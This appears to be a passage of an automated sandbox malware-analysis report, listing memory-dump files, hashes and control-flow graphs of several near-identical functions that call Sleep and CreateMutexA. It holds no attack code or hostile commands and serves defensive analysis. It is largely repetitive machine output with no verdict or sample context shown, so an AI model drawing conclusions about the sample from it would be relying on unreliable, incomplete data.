                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                    • Opcode ID: 3087c40c067e4dbfe0625f28f6caf729d146f301c20c6dde2218ff0092675190
                                                                                                                                                                    • Instruction ID: 2b0032d84d456bb39fc92284280cca6697b0fa20d0b26202d7e6b6189d40d730
                                                                                                                                                                    • Opcode Fuzzy Hash: 3087c40c067e4dbfe0625f28f6caf729d146f301c20c6dde2218ff0092675190
                                                                                                                                                                    • Instruction Fuzzy Hash: 12316F31704204DBEB18EB79DD897EDB762EF85320F24421DE414EB2D5D77A8980EB52
                                                                                                                                                                    Function 00FBA079 Relevance: 3.1, APIs: 2, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 241 fba079-fba099 245 fba09b-fba0a7 241->245 246 fba0c7-fba0e3 241->246 247 fba0a9-fba0b7 245->247 248 fba0bd-fba0c4 call fcd663 245->248 249 fba111-fba130 246->249 250 fba0e5-fba0f1 246->250 247->248 253 fba930-fba994 call fe6c6a Sleep CreateMutexA 247->253 248->246 251 fba15e-fba916 call fc80c0 249->251 252 fba132-fba13e 249->252 255 fba0f3-fba101 250->255 256 fba107-fba10e call fcd663 250->256 258 fba140-fba14e 252->258 259 fba154-fba15b call fcd663 252->259 271 fba9a7-fba9a8 253->271 272 fba996-fba998 253->272 255->253 255->256 256->249 258->253 258->259 259->251 272->271 273 fba99a-fba9a5 272->273 273->271
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00FBA963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                    • Opcode ID: ba8d35cd4553142eee4e6d1d4915d2d1470b4c35c7270f784d639b0cb7b27afb
                                                                                                                                                                    • Instruction ID: 20c1b14e3674bd424cd146ed98978392ff04be951665eb5e44bc6261e474bfe7
                                                                                                                                                                    • Opcode Fuzzy Hash: ba8d35cd4553142eee4e6d1d4915d2d1470b4c35c7270f784d639b0cb7b27afb
                                                                                                                                                                    • Instruction Fuzzy Hash: B3311871B002009BEB18EB7DDD89BDDB762EF91320F244219E415AB2D5D77A9980EF12
                                                                                                                                                                    Function 00FBA1AE Relevance: 3.1, APIs: 2, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 275 fba1ae-fba1ce 279 fba1fc-fba218 275->279 280 fba1d0-fba1dc 275->280 283 fba21a-fba226 279->283 284 fba246-fba265 279->284 281 fba1de-fba1ec 280->281 282 fba1f2-fba1f9 call fcd663 280->282 281->282 285 fba935 281->285 282->279 287 fba228-fba236 283->287 288 fba23c-fba243 call fcd663 283->288 289 fba293-fba916 call fc80c0 284->289 290 fba267-fba273 284->290 293 fba953-fba994 Sleep CreateMutexA 285->293 294 fba935 call fe6c6a 285->294 287->285 287->288 288->284 296 fba289-fba290 call fcd663 290->296 297 fba275-fba283 290->297 304 fba9a7-fba9a8 293->304 305 fba996-fba998 293->305 294->293 296->289 297->285 297->296 305->304 307 fba99a-fba9a5 305->307 307->304
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00FBA963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                    • Opcode ID: 7c5ac8a279115441110840b04b2c31acb38a46fce927f2f399d96af85f6791a1
                                                                                                                                                                    • Instruction ID: 16a47b3c12ca20f9017ecb45b7c22baafdb353d352c9822bc10ea08bdd334cce
                                                                                                                                                                    • Opcode Fuzzy Hash: 7c5ac8a279115441110840b04b2c31acb38a46fce927f2f399d96af85f6791a1
                                                                                                                                                                    • Instruction Fuzzy Hash: 27314A31B002019FEB08EB7DDD89BDDB762EF85320F244219E414AB2D5D77A8980EF12
                                                                                                                                                                    Function 00FBA418 Relevance: 3.1, APIs: 2, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 309 fba418-fba438 313 fba43a-fba446 309->313 314 fba466-fba482 309->314 317 fba448-fba456 313->317 318 fba45c-fba463 call fcd663 313->318 315 fba4b0-fba4cf 314->315 316 fba484-fba490 314->316 323 fba4fd-fba916 call fc80c0 315->323 324 fba4d1-fba4dd 315->324 321 fba492-fba4a0 316->321 322 fba4a6-fba4ad call fcd663 316->322 317->318 319 fba93f-fba949 call fe6c6a * 2 317->319 318->314 340 fba94e 319->340 341 fba949 call fe6c6a 319->341 321->319 321->322 322->315 329 fba4df-fba4ed 324->329 330 fba4f3-fba4fa call fcd663 324->330 329->319 329->330 330->323 342 fba953-fba994 Sleep CreateMutexA 340->342 343 fba94e call fe6c6a 340->343 341->340 345 fba9a7-fba9a8 342->345 346 fba996-fba998 342->346 343->342 346->345 347 fba99a-fba9a5 346->347 347->345
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00FBA963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                    • Opcode ID: c3563732d69955f48b1328baa5351a20b49dc6da1fa4acbc0c701fc963c36fe6
                                                                                                                                                                    • Instruction ID: d9271a54fa5841fa822e770f7138d97541996fd9d78d94f83fc9db04e3a40c3a
                                                                                                                                                                    • Opcode Fuzzy Hash: c3563732d69955f48b1328baa5351a20b49dc6da1fa4acbc0c701fc963c36fe6
                                                                                                                                                                    • Instruction Fuzzy Hash: 1D314A31B00240DBEB18EB7DDD8DBEDB761EF91320F244219E414DB2D5D77A4980AB52
                                                                                                                                                                    Function 00FBA54D Relevance: 3.1, APIs: 2, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 349 fba54d-fba56d 353 fba59b-fba5b7 349->353 354 fba56f-fba57b 349->354 357 fba5b9-fba5c5 353->357 358 fba5e5-fba604 353->358 355 fba57d-fba58b 354->355 356 fba591-fba598 call fcd663 354->356 355->356 359 fba944-fba949 call fe6c6a 355->359 356->353 361 fba5db-fba5e2 call fcd663 357->361 362 fba5c7-fba5d5 357->362 363 fba632-fba916 call fc80c0 358->363 364 fba606-fba612 358->364 376 fba94e 359->376 377 fba949 call fe6c6a 359->377 361->358 362->359 362->361 369 fba628-fba62f call fcd663 364->369 370 fba614-fba622 364->370 369->363 370->359 370->369 379 fba953-fba994 Sleep CreateMutexA 376->379 380 fba94e call fe6c6a 376->380 377->376 383 fba9a7-fba9a8 379->383 384 fba996-fba998 379->384 380->379 384->383 385 fba99a-fba9a5 384->385 385->383
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00FBA963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
